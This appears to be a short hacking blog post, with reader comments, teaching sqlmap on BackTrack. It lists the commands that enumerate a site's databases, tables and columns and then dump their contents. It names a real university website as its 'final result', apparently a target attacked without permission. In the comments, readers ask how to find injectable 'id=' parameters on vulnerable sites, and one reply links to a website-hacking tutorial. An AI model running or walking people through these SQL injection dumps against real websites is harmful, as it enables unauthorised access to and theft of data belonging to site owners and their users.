Hey guys in this video you all will learn how to use sqlmap in backtrack
Syntax used in the ViDEO
For scanning url
./sqlmap.py -u[url]
For getting Database
./sqlmap.py -u[url] --dbs
For Getting tables
./sqlmap.py -u [url] --tables -D [database]
For getting Column
./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
for Dumping whole column.
./sqlmap.py -u [url] --dump --columns -T [table name] -D [databasename]
For specific column dump
./sqlmap.py -u [url] --dump -C [column name] -T [table name] -D [database name]
FINAL RESULT
http://www.khyber.edu.pk/
Well, Its easier to learn this way. Your way of devloping and explaining the things is different.. and i like it that way..
ReplyDeleteThanks for sharing your knowledge.
R@hul
You are welcome
ReplyDeletehello sir tell me how to find out of error id=? of any vunlerable website
ReplyDeletehello tell me how to find out the error id
ReplyDeletelike http://www.khyber.edu.pk/pages.php?id=????????/ this
REad This http://www.hackerzadda.com/2010/10/website-hacking-using-sql-injection.html
Delete